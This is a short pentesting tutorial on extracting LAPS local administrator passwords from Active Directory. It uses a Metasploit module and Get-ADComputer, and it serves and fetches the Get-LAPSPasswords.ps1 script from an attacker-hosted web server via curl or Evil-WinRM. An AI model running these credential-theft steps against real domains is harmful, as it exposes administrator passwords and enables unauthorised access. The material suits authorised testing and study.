LAPS (Local Administrator Password Solution) Pentesting

LAPS provides management of local account passwords of domain joined computers. Passwords are stored in Active Directory.

Enumeration

msfconsole
use post/windows/gather/credentials/enum_laps
set session 2
exploit


Obtain Administrator's Password

First, check if you are in the LAPS_Readers group.

net user <current-username>
# Global Group memberships  *LAPS_Readers

Using Get-ADComputer

Get-ADComputer gets the information of the Active Directory computer.

Get-ADComputer -Identity '<active-directory-computer-name>' -property 'ms-mcs-admpwd'

Using Get-LAPSPasswords.ps1

  1. Download the Payload in Local Machine

    If you are in LAPS_Readers, you can get the administrator's password using Get-LAPSPasswords.ps1{:target="_blank"}{:rel="noopener"}.

    wget https://github.com/kfosaaen/Get-LAPSPasswords/blob/master/Get-LAPSPasswords.ps1
    
  2. Transfer the Payload to Target Machine

    • via PowerShell

      First off, open web server in local machine.

      python3 -m http.server 8000
      

      Then curl in target machine

      curl http://<local-ip>:8000/Get-LAPSPasswords.ps1 -o .\Get-LAPSPasswords.ps1
      
    • via Evil-WinRM

      If you connect the remote Windows machine with Evil-WinRM, you can use directly by adding -s flag when connecting.

      evil-winrm -i <target-ip> -u username -p password -s /path/to/current/directory
      

      Then just execute the payload in evil-winrm console.

      PS > upload .\Get-LAPSPasswords.ps1 c:\Users\<username>\Desktop\Get-LAPSPasswords.ps1
      
  3. Execute the Payload in Target Machine

    .\Get-LAPSPasswords.ps1